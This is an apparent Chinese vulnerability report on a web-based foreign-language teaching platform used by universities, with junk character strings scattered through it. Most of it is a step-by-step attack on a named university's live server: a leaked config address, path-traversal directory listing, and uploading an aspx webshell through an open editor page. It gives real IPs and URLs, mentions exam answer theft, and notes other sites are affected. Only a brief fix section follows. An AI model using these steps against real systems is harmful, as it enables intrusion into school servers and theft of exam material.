新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
4 S" i4 _2 R2 F$ f
3 u2 `" H: {5 U0 T! U详细说明：
0 h. ]% H, ~. ^: r; e4 w
; m# k3 n/ E/ I' F以南开大学的为例:
  K2 ?( c6 w$ x/ `, U8 v0 mhttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
/ P" \) I; n3 D6 S8 p1 H6 r5 r; @8 n: C</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
" b( b8 F' h; M/ z6 Y直接访问
http://222.30.60.3/NPELS/CommonService.asmx
* R5 H$ p! y% t' \6 ?2 x% S使用GetTestClientFileList操作，直接 HTTP GET 列目录：
) {+ H/ ]* o  M2 s% ihttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
. [: V6 P. g7 N4 W; k进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

- n* ~2 K9 }" `" `, m  }) w发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 J7 Y& n- }( N' x7 A4 p6 a可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
6 e* ~4 H+ E# g; _/ ]4 c上传后继续列目录找到木马地址直接访问即可

OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
5 a  F% F2 I, I6 ~0 W, y+ o8 u! F
$ U! q7 ]% {6 w" s  b9 ?% i6 m列目录：
) [( K  H# b. j. Bhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

7 L: A8 M4 _3 t" n0 F' T, R上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

2 |" y6 D9 N6 l5 X6 O7 K$ o修复方案：
9 Q1 |( k  }0 C& L4 B好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
( a: D. p! {1 B. ~: N6 ?并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​